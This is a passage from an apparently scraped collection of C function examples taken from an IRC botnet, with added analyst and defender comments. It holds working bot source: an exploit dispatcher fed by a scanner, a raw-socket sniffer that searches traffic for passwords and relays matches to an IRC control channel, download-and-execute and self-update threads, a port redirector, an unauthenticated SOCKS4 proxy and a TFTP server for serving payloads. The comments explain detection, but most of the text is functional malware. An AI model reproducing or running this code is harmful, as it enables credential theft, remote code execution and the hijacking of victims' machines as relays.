						irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
					else
						irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
				}


				LeaveCriticalSection(&CriticalSection);
			} else {
				// Hand the responsive host to the selected entry of the exploit
				// table, together with the IRC reporting details.
				EXINFO exinfo;

				sprintf(exinfo.ip, finet_ntoa(in));
				sprintf(exinfo.command, exploit[scan.exploit].command);
				if (scan.msgchan[0] != '\0')
					sprintf(exinfo.chan, scan.msgchan);
				else
					sprintf(exinfo.chan, scan.chan);
				exinfo.sock = scan.sock;
				exinfo.notice = scan.notice;
				exinfo.silent = scan.silent;
				exinfo.port = scan.port;
				exinfo.threadnum = threadnum;
				exinfo.exploit = scan.exploit;
				exploit[scan.exploit].exfunc(exinfo);


			}
		}
		Sleep(2000);
	}
	clearthread(threadnum);

	ExitThread(0);
}
Exemple #9
// Analyst note: passive keyword sniffer. It opens a raw IP socket bound to
// the address GetIP(sniff.sock) returns, switches it to receive-all mode with
// SIO_RCVALL, and searches the payload of TCP segments whose flags byte is 24
// (PSH|ACK) for the strings in the pswords table (defined elsewhere). On a
// match it sends the packet text, source address and port to the IRC channel.
// Defender view: a raw socket in SIO_RCVALL mode needs administrator rights
// and is unusual outside packet-capture tools. Enumerating processes that hold
// raw sockets, or alerting on the SIO_RCVALL ioctl, surfaces this behaviour.
// Matched payload is relayed in clear over IRC, so credentials sniffed on the
// host's segment are exposed a second time on the control channel.
DWORD WINAPI SniffThread(LPVOID param) {

	char sendbuf[IRCLINE], rawdata[65535], *Packet;
	int i;
	DWORD dwRet, dwMode = 1;

	// Private copy of the request; gotinfo is set on the caller's struct.
	PSNIFF sniff = *((PSNIFF *)param);
	PSNIFF *sniffs = (PSNIFF *)param;
	sniffs->gotinfo = TRUE;

	IPHEADER *ip;
	TCPHEADER *tcp;
	IN_ADDR ia;

	// Bind address: the local interface address, taken from the IRC socket via GetIP.
	SOCKET sniffsock;
	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons(0);
	ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));

	if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
		sprintf(sendbuf, "[PSNIFF]: Error: Socket() Failed, Returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		clearthread(sniff.threadnum);

		ExitThread(0);
	}
	threads[sniff.threadnum].sock = sniffsock;

	if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
		sprintf(sendbuf, "[PSNIFF] Error: Bind() Failed, Returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		fclosesocket(sniffsock);
		clearthread(sniff.threadnum);

		ExitThread(0);
	}

	// dwMode = 1 turns receive-all on for the bound interface.
	if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
		sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		fclosesocket(sniffsock);
		clearthread(sniff.threadnum);

		ExitThread(0);
	}

	// Capture loop; it ends only when recv fails.
	while(1) {
		memset(rawdata, 0, sizeof(rawdata));
		Packet = (char *)rawdata;

		if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
            _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
			if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
			addlog(sendbuf);

            break;
        }

		// Protocol 6 is TCP.
		ip = (IPHEADER *)Packet;
		if (ip->proto == 6) {
			Packet += sizeof(*ip);
			tcp = (TCPHEADER *)Packet;

			ia.S_un.S_addr = ip->sourceIP;

			// 24 == 0x18 == PSH|ACK, i.e. segments carrying application data.
			if (tcp->flags == 24) {
				Packet += sizeof(*tcp);
				// Packets that already contain the "[PSNIFF]" tag are skipped,
				// presumably so the bot's own IRC reports are not matched again.
				if (strstr(Packet, "[PSNIFF]") == NULL) {
					// pswords is a table terminated by an entry with a NULL text.
					for (i=0;pswords[i].text;i++) {
						if ((strstr(Packet, pswords[i].text)) != NULL) {
							_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s Packet From: %s:%d - %s.", ptype[pswords[i].type], finet_ntoa(ia), fntohs(tcp->sport), Packet);
							if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
							addlog(sendbuf);

							break;
						}
					}
				}
			}
		}
	}
	fclosesocket(sniffsock);
	clearthread(sniff.threadnum);

	ExitThread(0);
}
Exemple #10
// Analyst note: fetches the URL in dl.data1 through WinINet into the path in
// dl.data2, then acts on the request flags as the code below uses them:
// bdata1 marks an update, bdata2 asks for the file to be run, bdata3 hides
// the window, verbose waits for the child to exit and reports its run time.
// No length, checksum or signature check is applied to the downloaded file
// before it is executed.
// Defender view: the sequence is a network fetch, a file write, then
// CreateProcess on the file just written, all from one process. In the
// update branch the running instance calls uninstall() (not shown), quits IRC
// and exits, so the new process loses its parent immediately.
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	// Private copy of the request; gotinfo is set on the caller's struct.
	NTHREAD dl = *((NTHREAD *)param);
	NTHREAD *dls = (NTHREAD *)param;
	dls->gotinfo = TRUE;
	IRC* irc=(IRC*)dl.conn;

	char dlfrom[MAX_HOSTNAME];
	char dlto[MAX_PATH];
	strncpy(dlfrom,dl.data1,sizeof(dlfrom));
	strncpy(dlto,dl.data2,sizeof(dlto));

	// ih is a WinINet session handle opened elsewhere in the program.
	HANDLE fh = fInternetOpenUrl(ih, dlfrom, NULL, 0, 0, 0);
	if (fh != NULL)
	{
		HANDLE f = CreateFile(dlto, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		if (f < (HANDLE)1)
		{
			if (!dl.silent)
				irc->pmsg(dl.target,"%s Couldn't open file for writing: %s.",(dl.bdata1?update_title:download_title),dlto);

			fInternetCloseHandle(fh);
			clearthread(dl.threadnum);
			ExitThread(0);
		}

		total = 0;
		start = GetTickCount();
		// Side buffer holding up to the first 512000 bytes; nothing in this
		// function reads it back.
		char *fileTotBuff=(char *)malloc(512000);
		do
		{
			ZeroMemory(buffer,sizeof(buffer));
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			WriteFile(f, buffer, r, &d, NULL);
			
			if ((total) < 512000)
			{
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
		}
		while (r > 0);

		// Bytes per second; the +1 avoids dividing by zero for sub-second transfers.
		speed = total / (((GetTickCount() - start) / 1000) + 1);
		free(fileTotBuff);
		CloseHandle(f);
		fInternetCloseHandle(fh);

		if (!dl.silent)
			irc->pmsg(dl.target,"%s File download: %.1fKB to: %s @ %.1fKB/sec.",(dl.bdata1?update_title:download_title), total/1024.0, dlto, speed/1024.0);

		// Plain download with the run flag set: start the file from its own directory.
		if (!dl.bdata1 && dl.bdata2)
		{
			STARTUPINFO si;
			PROCESS_INFORMATION pi;
			BOOL hide=dl.bdata3, wait=dl.verbose;
			char path[MAX_PATH];
			// path becomes the directory part of dlto and is used as the child's
			// working directory.
			strncpy(path,dlto,sizeof(path));
			if (!fPathRemoveFileSpec(path))
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Couldn't parse path, error: <%d>", download_title, GetLastError());
				return 1;
			}
			ZeroMemory(&si,sizeof(si));
			ZeroMemory(&pi,sizeof(pi));
			si.cb=sizeof(si);
			si.dwFlags = STARTF_USESHOWWINDOW;
			si.wShowWindow = (hide?SW_HIDE:SW_SHOW);

			if (!CreateProcess(NULL,dlto,NULL,NULL,FALSE,0,NULL,path,&si,&pi))
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Failed to create process: \"%s\", error: <%d>", download_title, dlto, GetLastError());
				return 1;
			}
			else
			{
				DWORD start=GetTickCount();
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Created process: \"%s\", PID: <%d>",download_title,dlto,pi.dwProcessId);
				
				// verbose: block until the child exits, then report its run time
				// as [N hour(s)] MM:SS.
				if (dl.verbose)
				{	
					WaitForSingleObject(pi.hProcess,INFINITE);
					DWORD stop=GetTickCount();
					char ttime[120],stime[120];
					stime[0]='\0';
					DWORD total = ((stop - start)/1000);
					DWORD hours = (total%86400)/3600;
					DWORD minutes = ((total%86400)%3600)/60;
					DWORD seconds = ((total%86400)%3600)%60;
					if (hours>0)
					{
						sprintf(ttime," %d%s",hours,(hours==1?" hour":" hours"));
						strcat(stime,ttime);
					}
					sprintf(ttime," %.2d:%.2d",minutes,seconds);
					strcat(stime,ttime);

					irc->pmsg(dl.target,"%s Process Finished: \"%s\", Total Running Time: %s.",download_title,dlto,stime);
				}
				if (pi.hProcess) CloseHandle(pi.hProcess);
				if (pi.hThread) CloseHandle(pi.hThread);
			}

		// download is an update
		}
		else if (dl.bdata1)
		{
			// The replacement binary is started detached. dwFlags is left at zero
			// here, so the SW_HIDE value in wShowWindow is set without
			// STARTF_USESHOWWINDOW.
			PROCESS_INFORMATION pinfo;
			STARTUPINFO sinfo;
			ZeroMemory(&pinfo, sizeof(PROCESS_INFORMATION));
			ZeroMemory(&sinfo, sizeof(STARTUPINFO));
			sinfo.cb = sizeof(sinfo);
			sinfo.wShowWindow = SW_HIDE;
			if (CreateProcess(NULL, dlto, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS|DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE)
			{
				// Hand-over: call uninstall() (not shown), leave IRC with the
				// update quit message, and terminate the current process.
				uninstall(TRUE,(dl.idata1==1?TRUE:FALSE));
				irc->quit(str_quit_upd);
				Sleep(FLOOD_DELAY);
				irc->disconnect();
				fWSACleanup();
				ExitProcess(EXIT_SUCCESS);
			}
			else
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Update failed: Error executing file: %s.",update_title,dlto);
			}
		}
	}
	else
	{
		if (!dl.silent)
			irc->pmsg(dl.target,"%s Bad URL or DNS Error, error: <%d>",(dl.bdata1?update_title:download_title),GetLastError());
	}
	clearthread(dl.threadnum);
	ExitThread(0);

		return 0;
}
Exemple #11
// part of the redirect function, handles sending/recieving for the remote connection.
// Analyst note: one half of a TCP port redirect (relay). For an already
// accepted client socket (threads[threadnum].sock) it connects out to
// redirect.dest:redirect.port, starts RedirectLoop2Thread (not shown;
// presumably the reverse direction -- confirm), and then copies every byte
// received from the client socket to the outbound socket until either side
// fails or closes.
// Defender view: the infected host behaves as a relay. Flow records show an
// inbound TCP session paired with an outbound session to a fixed destination
// with matching byte counts and timing, and traffic reaching the destination
// carries the infected host's address rather than the original client's.
DWORD WINAPI RedirectLoopThread(LPVOID param)
{
	// Private copy of the request; gotinfo is set on the caller's struct.
	REDIRECT redirect = *((REDIRECT *)param);
	REDIRECT *redirectp = (REDIRECT *)param;
	redirectp->gotinfo = TRUE;

	int threadnum=redirect.cthreadnum;

	char sendbuf[IRCLINE], buff[4096];
	int err;
	DWORD id;
	
	SOCKET ssock;
	// Single-pass do/while: every `break` jumps to the cleanup after the loop.
	do {
		if ((ssock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) break;

		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_port = fhtons((unsigned short)redirect.port);

		// redirect.dest may be a dotted address or a host name; either way the
		// first address of the resolved host entry is used.
		IN_ADDR iaddr;
		iaddr.s_addr = finet_addr(redirect.dest);
		LPHOSTENT hostent;
		if (iaddr.s_addr == INADDR_NONE) 
			hostent = fgethostbyname(redirect.dest);
		else 
			hostent = fgethostbyaddr((const char *)&iaddr, sizeof(iaddr), AF_INET);
		if (hostent == NULL) break;
		ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list);
	
		if ((err = fconnect(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) break;

		// Register a child entry in the thread table for the outbound socket and
		// link it to the client socket, then start the second relay thread and
		// wait until it sets cgotinfo.
		redirect.cgotinfo = FALSE;
		sprintf(sendbuf,"[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.", finet_ntoa(ssin.sin_addr), ssin.sin_port, redirect.threadnum); 
		redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,ssock);
		threads[redirect.cthreadnum].parent = redirect.threadnum;
		threads[redirect.cthreadnum].csock = threads[threadnum].sock;
		if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoop2Thread,(LPVOID)&redirect,0,&id)) {
			while (redirect.cgotinfo == FALSE) 
				Sleep(50);
		} else {
			addlogv("[REDIRECT]: Failed to start connection thread, error: <%d>.", GetLastError());
			break;
		}

		// Relay loop, client -> destination, in chunks of up to 4096 bytes.
		while (1) {
			memset(buff, 0, sizeof(buff));
			if ((err = frecv(threads[threadnum].sock, buff, sizeof(buff), 0)) <= 0) break;
			if ((err = fsend(ssock, buff, err, 0)) == SOCKET_ERROR) break;
		}
		break;
	} while (1);

	// Both ends are closed whichever side ended the relay.
	fclosesocket(threads[threadnum].sock);
	fclosesocket(ssock);

	clearthread(threadnum);

	ExitThread(0);
}
Exemple #12
// function for downloading files/updating
DWORD WINAPI DownloadThread(LPVOID param)
{
	// Thread entry that fetches dl.url into the local file dl.dest and then,
	// depending on dl.run / dl.update, launches the downloaded file.
	// Analyst summary of what the visible code does:
	//   - the payload is written to disk before any check is made;
	//   - the only checks are an optional length comparison (dl.filelen) and
	//     an optional CRC32 comparison (dl.expectedcrc); neither authenticates
	//     the origin of the file;
	//   - with dl.update == 1 the new file is started hidden (SW_HIDE) and the
	//     running instance then calls uninstall() and ExitProcess().
	// Status lines carry the fixed prefix "[DOWNLOAD]:" and are written to the
	// log and, unless dl.silent, sent to the IRC channel.
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	// Copy the launcher's DOWNLOAD by value and flag that the copy was taken.
	DOWNLOAD dl = *((DOWNLOAD *)param);
	DOWNLOAD *dls = (DOWNLOAD *)param;
	dls->gotinfo = true;

	// ih is a handle defined outside this block (presumably the WinINet
	// session handle).
	HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
	if (fh != NULL) {
		// open the file
		HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		// make sure that our file handle is valid
		// NOTE(review): CreateFile reports failure as INVALID_HANDLE_VALUE, not
		// NULL; whether this pointer comparison catches that value depends on
		// how the compiler orders pointer values -- confirm.
		// NOTE(review): this early exit leaves fh open; it does not pass
		// through the badfile cleanup label.
		if (f < (HANDLE)1) {
			sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
			if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
			addlog(buffer);

			clearthread(dl.threadnum);

			ExitThread(EXIT_FAILURE);
		}

		total = 0;
		start = GetTickCount();

		// In-memory copy of the first 512000 bytes. Only the commented-out CRC
		// block below reads it, so in the live code it is filled and freed
		// without being used. NOTE(review): the malloc result is not checked.
		char *fileTotBuff=(char *)malloc(512000);	//FIX ME: Only checks first 500 kb
		do {
			memset(buffer, 0, sizeof(buffer));
			// NOTE(review): the return value is ignored; if the read fails, r
			// may hold a stale or unset value for the rest of the iteration.
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			// Xorbuff is defined elsewhere; presumably it decodes the chunk in
			// place when the transfer was flagged as encrypted.
			if (dl.encrypted)
				Xorbuff(buffer,r);
			WriteFile(f, buffer, r, &d, NULL);
			
			if ((total) < 512000) {
				//We have free bytes...
				//512000-total
				// Copy is clamped to the space left in fileTotBuff.
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
			if (dl.filelen) 
				if (total>dl.filelen) 
					break; //er, we have a problem... filesize is too big.
			// The thread's display name doubles as a progress indicator.
			// NOTE(review): unbounded sprintf of dl.url into threads[].name;
			// the size of that field is not visible here.
			if (dl.update != 1) 
				sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: File download: %s (%dKB transferred).", dl.url, total / 1024);
			else 
				sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: Update: %s (%dKB transferred).", dl.url, total / 1024);
		} while (r > 0);

		bool goodfile=true;

		// Length check. Unlike the other status messages, this one is sent to
		// IRC even when dl.silent is set.
		if (dl.filelen) {
			if (total!=dl.filelen) {
				goodfile=false;
				sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
				irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
				addlog(buffer);
			}
		}
		// +1 keeps the divisor non-zero for sub-second transfers.
		speed = total / (((GetTickCount() - start) / 1000) + 1);
		CloseHandle(f);

		/* if (dl.expectedcrc) {
			unsigned long crc,crclength;
			sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
			crclength=total;
			if (crclength>512000) crclength=512000;
			crc=crc32(fileTotBuff,crclength);
			if (crc!=dl.expectedcrc) {
				goodfile=false;
				irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
			}
			
		} */
		free(fileTotBuff);
		
		// CRC32 of the file as written to disk (crc32f is defined elsewhere).
		// CRC32 detects accidental corruption only; it is not a cryptographic
		// integrity or authenticity check.
		if (dl.expectedcrc) { 
			unsigned long crc=crc32f(dl.dest); 
			if (crc!=dl.expectedcrc) { 
				goodfile=false;
				sprintf(buffer,"[DOWNLOAD]: CRC Failed (%d != %d).", crc, dl.expectedcrc);
				irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); 
				addlog(buffer);
			} 
		} 

		// A failed check skips execution, but the file stays on disk: nothing
		// in this function deletes dl.dest.
		if (goodfile==false) 
			goto badfile;
		
		//download isn't an update
		if (dl.update != 1) {
			sprintf(buffer, "[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// Optional execution of the downloaded file in a visible window.
			if (dl.run == 1) {
				CreateProc(dl.dest,NULL,SW_SHOW);
				if (!dl.silent) {
					sprintf(buffer,"[DOWNLOAD]: Opened: %s.",dl.dest);
					irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
					addlog(buffer);
				}
			}

		// download is an update
		} else {
			sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			// Self-replacement: start the new binary hidden, then remove the
			// current installation and terminate this process.
			if (CreateProc(dl.dest,NULL,SW_HIDE) != 0) {
				fWSACleanup();
				uninstall();
				ExitProcess(EXIT_SUCCESS);
			} else {
				sprintf(buffer,"[DOWNLOAD]: Update failed: Error executing file: %s.",dl.dest);
				if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
				addlog(buffer);
			}
		}
	} else {
		sprintf(buffer,"[DOWNLOAD]: Bad URL, or DNS Error: %s.",dl.url);
		if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
		addlog(buffer);
	}

	// Common exit. Reached with fh == NULL on the "Bad URL" path as well.
badfile:
	fInternetCloseHandle(fh);

	clearthread(dl.threadnum);

	ExitThread(EXIT_SUCCESS);
}
Exemple #13
DWORD WINAPI VisitThread(LPVOID param)
{
	// Thread entry that issues a single HTTP request to the URL in visit.data1
	// and reports only success or failure. The response body is never read.
	// visit.data2 is passed in the referrer position of the request call
	// (assuming fHttpOpenRequest mirrors HttpOpenRequest -- not shown here).
	HINTERNET ch = 0, req = 0;

	const char *accept = "*/*";
	char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];

	// Copy the launcher's NTHREAD by value and flag that the copy was taken.
	NTHREAD visit = *((NTHREAD *)param);
	NTHREAD *visits = (NTHREAD *)param;
	IRC* irc=(IRC*)visit.conn;
	visits->gotinfo = TRUE;

	// zero out string variables
	memset(vhost, 0, sizeof(vhost));
	memset(vuser, 0, sizeof(vuser));
	memset(vpass, 0, sizeof(vpass));
	memset(vpath, 0, sizeof(vpath));

	// zero out url structure and set options
	// The string pointers stay NULL while the lengths are non-zero; with the
	// WinINet InternetCrackUrl API this requests pointers into the original
	// URL string plus the component lengths (assuming fInternetCrackUrl is
	// that API -- confirm).
	URL_COMPONENTS url;
	memset(&url, 0, sizeof(url));
	url.dwStructSize = sizeof(url);
	url.dwHostNameLength = 1;
    url.dwUserNameLength = 1;
    url.dwPasswordLength = 1;
    url.dwUrlPathLength = 1;

	// do { ... } while(0): single pass, "break" jumps to the reporting code.
	do {
		// crack the url (break it into its main parts)
		if (!fInternetCrackUrl(visit.data1, strlen(visit.data1), 0, &url)) {
			sprintf(sendbuf,"%s Invalid URL.", visit_title);
			break;
		}

		// copy url parts into variables
		// NOTE(review): each strncpy is bounded by the component length taken
		// from the URL, not by the destination size (128 / 128 / 128 / 256
		// bytes). A component longer than its buffer overruns the stack
		// buffer, and one of exactly that size leaves it unterminated.
		if (url.dwHostNameLength > 0) 
			strncpy(vhost, url.lpszHostName, url.dwHostNameLength);

		int vport = url.nPort;
		if (url.dwUserNameLength > 0) 
			strncpy(vuser, url.lpszUserName, url.dwUserNameLength);

		if (url.dwPasswordLength > 0) 
			strncpy(vpass, url.lpszPassword, url.dwPasswordLength);

		if (url.dwUrlPathLength > 0) 
			strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);


		// ih is defined outside this block (presumably the WinINet session).
		ch = fInternetConnect(ih, vhost,(unsigned short)vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
		if (ch == NULL) {
			sprintf(sendbuf,"%s Could not open a connection.", visit_title);
			break;
		}

		// NOTE(review): &accept is the address of a single pointer. If this
		// parameter is the accept-types list of HttpOpenRequest, that API
		// expects a NULL-terminated array of strings, and no terminator is
		// guaranteed after the one element here -- confirm.
		req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.data2, &accept, INTERNET_FLAG_NO_UI, 0);
		if (req == NULL) {
			sprintf(sendbuf,"%s Failed to connect to HTTP server.", visit_title);
			break;
		}

		if (fHttpSendRequest(req, NULL, 0, NULL, 0))
			sprintf(sendbuf,"%s URL visited.", visit_title);
		else
			sprintf(sendbuf,"%s Failed to get requested URL from HTTP server.", visit_title);		
	} while(0);

	// Every path through the block above sets sendbuf before this point.
	if (!visit.silent) irc->pmsg(visit.target,sendbuf);

	// Both handles are closed unconditionally; either may still be 0 here.
	fInternetCloseHandle(ch);
	fInternetCloseHandle(req);

	clearthread(visit.threadnum);

	ExitThread(0);

	return 0;
}
Exemple #14
DWORD WINAPI Socks4ClientThread(LPVOID param)
{
	// Per-client handler of a SOCKS4 proxy. It reads one request header from
	// the accepted socket, accepts only version 4 CONNECT requests, optionally
	// compares the client's userid with a configured one, connects to the
	// requested address and port, sends the 8-byte reply and then hands both
	// sockets to TransferLoop (defined elsewhere).
	// Analyst note: when socks4.userid is empty, no check of any kind is made,
	// so any client that can reach the listening port can use the host as a
	// relay to an arbitrary destination.
	SOCKS4 socks4 = *((SOCKS4 *)param);
	SOCKS4 *socks4p = (SOCKS4 *)param;
	// Signals the launcher that its SOCKS4 struct has been copied.
	socks4p->cgotinfo = TRUE;

	int threadnum = socks4.cthreadnum;

	SOCKS4HEADER hdr;

	// Wait at most five seconds for the client to send its request.
	TIMEVAL timeout;
	timeout.tv_sec = 5;
	timeout.tv_usec = 0;
	fd_set fd;
	FD_ZERO(&fd);
	FD_SET(threads[threadnum].sock, &fd);

	// NOTE(review): only the timeout result (0) is handled here; an error
	// return from fselect falls through to frecv.
	if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}
	// NOTE(review): a single recv may deliver fewer bytes than sizeof(hdr).
	// hdr is not initialised first, so fields beyond the received length hold
	// indeterminate data when they are read below.
	if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);		
		ExitThread(0);
	}
	// Anything other than a version 4 CONNECT is dropped without a reply.
	if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}

	// FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing)
	// NOTE(review): hdr.userid comes from the network and is compared with
	// strcmp; nothing here guarantees it is NUL-terminated. The SOCKS4 userid
	// is sent in clear text, so this is an identifier match rather than
	// authentication.
	if (socks4.userid[0] != '\0') {
		if (strcmp(hdr.userid, socks4.userid) != 0) {
			addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid);
	
			// Reply is the first 8 bytes of the header with vn = 0 and the
			// result code in cd. NOTE(review): the memset assumes hdr.userid
			// is at least 1024 bytes; SOCKS4HEADER is declared elsewhere.
			hdr.vn = 0;
			hdr.cd = SOCKS4_REJECT_USERID;
			memset(&hdr.userid, 0, 1024);
			fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

			fclosesocket(threads[threadnum].sock);
			clearthread(threadnum);

			ExitThread(0);
		}
	}

	// Destination address and port are taken from the request header as
	// received (no byte-order conversion) and are not filtered in any way.
	SOCKADDR_IN tsin;
	memset(&tsin, 0, sizeof(tsin));
	tsin.sin_family = AF_INET;
	tsin.sin_port = hdr.destport;
	tsin.sin_addr.s_addr = hdr.destaddr;

	SOCKET tsock;
	if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
		addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError());

		hdr.vn = 0;
		hdr.cd = SOCKS4_REJECT;
		memset(&hdr.userid, 0, 1024);
		fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
	
		ExitThread(0);
	}

	// NOTE(review): tsock is not closed on this failure path.
	if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) {
		addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError());

		hdr.vn = 0;
		hdr.cd = SOCKS4_REJECT;
		memset(&hdr.userid, 0, 1024);
		fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);

		ExitThread(0);
	}

	// Grant the request and relay traffic between the two sockets until
	// TransferLoop returns.
	hdr.vn = 0;
	hdr.cd = SOCKS4_GRANT;
	memset(&hdr.userid, 0, 1024);
	fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
	TransferLoop(tsock, threads[threadnum].sock);

	fclosesocket(tsock);
	fclosesocket(threads[threadnum].sock);
	clearthread(threadnum);

	ExitThread(0);
}
Exemple #15
DWORD WINAPI tftpserver(LPVOID param) 
{ 
	// Minimal single-file TFTP server. It binds a UDP socket on tftp.port on
	// all interfaces and serves the local file tftp.filename to any client
	// that sends a read request (opcode 1) for tftp.requestname in "octet"
	// mode. It keeps no per-client state: every ACK is answered by seeking to
	// the block number the client reported.
	// Analyst notes: both error replies are fixed byte strings -- error code 1
	// with the text "File Not Found", and error code 4 with the text "kthx"
	// for any opcode other than RRQ or ACK. Log and IRC lines carry the fixed
	// prefix "[TFTP]:".
	FILE *fp;

	char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];
	int err=1; 

	// tftp is a by-value copy, so the threads++ / threads-- updates in this
	// function change only the local copy.
	TFTP tftp = *((TFTP *)param);
	TFTP *tftps = (TFTP *)param;
	tftps->gotinfo = TRUE;
	tftp.threads++; 

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
		Sleep(400);
		sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
		addlog(sendbuf);

		clearthread(tftp.threadnum);

		ExitThread(0);
	}
	threads[tftp.threadnum].sock=ssock;

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET; 
	ssin.sin_port = fhtons((unsigned short)tftp.port); 
	ssin.sin_addr.s_addr = INADDR_ANY; 

	// On a bind failure the function waits five seconds and calls itself.
	// NOTE(review): ssock is not closed first, and each retry adds a stack
	// frame, so a port that stays busy leaks one socket per attempt and the
	// recursion depth grows without bound.
	if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) { 
		Sleep(5000); 
		tftp.threads--; 

		return tftpserver(param); 
	} 

	// NOTE(review): ssock is left open on this failure path, and the message
